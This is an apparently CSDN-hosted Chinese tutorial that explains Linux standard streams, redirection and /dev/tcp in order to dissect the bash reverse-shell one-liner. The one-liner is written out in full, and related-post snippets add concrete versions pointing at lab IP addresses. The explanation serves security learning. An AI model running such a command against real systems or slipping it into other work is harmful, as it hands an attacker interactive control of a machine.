带你读懂bash一句话反弹shell

最新推荐文章于 2024-08-16 10:25:17 发布
最新推荐文章于 2024-08-16 10:25:17 发布
阅读量1.8k 收藏 5
点赞数 2
文章标签: linux shell 安全 网络安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42303523/article/details/113941209
版权
本文详细介绍了Linux中的标准输入、输出和错误重定向概念,以及如何通过重定向符号改变它们的读写对象。同时,文章还探讨了一种特定的bash命令行用法,用于创建反弹Shell,使得所有输入输出都通过网络连接进行,这对于理解Linux系统管理和网络安全具有重要意义。
摘要由CSDN通过智能技术生成

需要知道的linux知识

标准输入、标准输出、标准错误

在linux中输入一条命令会打开三个文件:标准输入、标准输出、标准错误。
在任何时候这个进程希望读取东西的时候都会从它的标准输入进行读取,在任何时候这个进程有输出的时候都会写入到标准输出,在任何时候这个进程有错误信息的时候都会写入到标准错误。

重定向

一般情况下,标准输入都是键盘,标准输出和标准错误都是显示器。
所谓的重定向,就是修改标准输入、标准输出、标准错误的读取或写入的对象。
常用的重定向操作符号有以下几个:

命令说明
command < file将command命令的输入重定向到 file。
command > file将command命令的输出重定向到 file。
command >> file将command命令的输出以追加的方式重定向到 file。
command 2> file将command命令的标准错误重定向到 file。
command 2>> file将command命令的标准错误以追加的方式重定向到 file。
command &> file将command命令的标准输出和标注错误都重定向到 file。
command >& file同上,一个含义。
m >& nm标识的 标准输入 \ 标准输出 \ 标准错误 重定向为n标识的的标准输入 \ 标准输出 \ 标准错误的去处。m、n取值0、1、2,分别表示标准输入、标准输出、标准错误。

/dev/tcp/

linux中有一个特殊的文件,以任何方式打开/dev/tcp/HOST/PORT都将向HOST/PORT发送tcp连接请求,读取该文件则表示从socket取其中的内容,写该文件则表示向socket发送内容。

不论是读还是写,其实都是进行了打开操作之后的动作。

bash一句话反弹shell

bash一句话反弹shell的内容是:

bash -i >& /dev/tcp/HOST/PORT 0>&1

bash -i开启了一个交互式的shell。
然后使用>&将标准输出和标准错误重定向到/dev/tcp/HOST/PORT。
最后使用0>&1将标准输入的读取对象设置为标准输出的输出对象,即将标准输入也重定向到/dev/tcp/HOST/PORT。
总结下来,就是执行了bash -i进程,该进程的标准输入、标准输出、标准错误都是/dev/tcp/HOST/PORT。
其效果就是所有的输入和输出都来自于网络的另一端。

lesion__
关注
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
linux反弹shell的原理浅析
黑锤的博客
08-14 780
反弹shell文件描述符与重定向 在这里最难理解的就是文件描述符和重定向这两部分 先来讲一下linux的文件描述符,什么是文件描述符, 在linux系统中将所有设备都当做文件来处理,而linux文件描述符用来标识每个文件对象,在我理解中就是描述符用来指定对象的,这样才能井然有序的运行。在linux系统中就连输入设备和输出设备都被当成是文件来处理就拿显示器和键盘输入都拿来当成文件处理,他们都有...
浅析Linuxbash反弹shell原理
01-08
环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142 过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp/192.168.25.144/8888 0>&1 攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口,并将其
反弹shell--bash一句话解析
小刚的博客
01-10 3282
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 反弹shell解析bash反弹shell解析拆分语句了解一下交互式连接设备文件描述符合并输入输出大合并 bash反弹shell解析 最基础的反弹shell语句,这么久只会用,但不知道其中的奇妙之处 真是妙蛙种子被踢出了米奇妙妙屋。。。 bash -i >& /dev/tcp/192.168.1.1/8888 0>&1 拆分语句了解一下 交互式 bash -i是打开一个.
网络安全-反弹shell详解(攻击,检测与防御)
最新发布
baimao__Ch的博客
08-16 686
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
linux 反弹shell
weixin_30426957的博客
06-30 138
Linux反弹shell笔记 0x00 NC命令详解 在介绍如何反弹shell之前,先了解相关知识要点。 nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp -v 参数,详细输出 n参数高数netcat不要DNS反向查询IP的域名 z参数,连接成功后立即关闭连接 ...
利用bash反弹shell
Fng的博客
04-26 1352
反弹Shell是指GetShell的过程由目标主机主动发起(反向连接)。
反弹shell
litiammmm的博客
07-29 862
感谢:https://zhuanlan.zhihu.com/p/138393396 https://www.cnblogs.com/iouwenbo/p/11277453.html 什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端(普通人)发起请求到该端口,并将其命令行的输入输出转到控制端(黑客)。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹s.
运维知识点-linux操作系统-linux命令行-BashShell
aming小老弟
11-17 532
Yum(全称为 Yellow dog Updater, Modified)是一个在Fedora和RedHat以及CentOS中的Shell前端软件包管理器。基于RPM包管理,能够从指定的1、显示已经安装的软件包2、查找可以安装的软件包 (以 tomcat 为例)3、安装软件包 (以 tomcat 为例)4、卸载软件包 (以 tomcat 为例)5、列出软件包的依赖 (以 tomcat 为例)6、-y 自动应答yes我们可以用 -y 来应答所有的 yes , 比如我们安装 tomcat 的时候,
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 892
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
20年时候收集的一些信息安全岗面试题
课嗨教育的专栏
05-02 7690
目录 面试一 面试二 面试三 更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-CSDN博客 面试一 个人介绍: 自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 3、业绩/成绩: 研究类:freebuff SRC I春秋...
什么是反弹 Shell
weixin_36888745的博客
07-07 572
简单来说,Shell 就是实现用户命令的接口,通过这个接口我们就能实现对计算机的控制,比如我们常见的 ssh 就是执行的 Shell 命令实现对远程对服务器的控制。
一句话反弹shell代码
09-10
这是一句简单的 Bash 命令,用于在远程主机上打开一个反弹 shell。它使用了 Bash 的内置命令 "bash -i" 来启动一个交互式 shell,并使用 ">&" 和 "/dev/tcp/IP地址/端口号" 来将 shell 的输入和输出重定向到远程主机...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值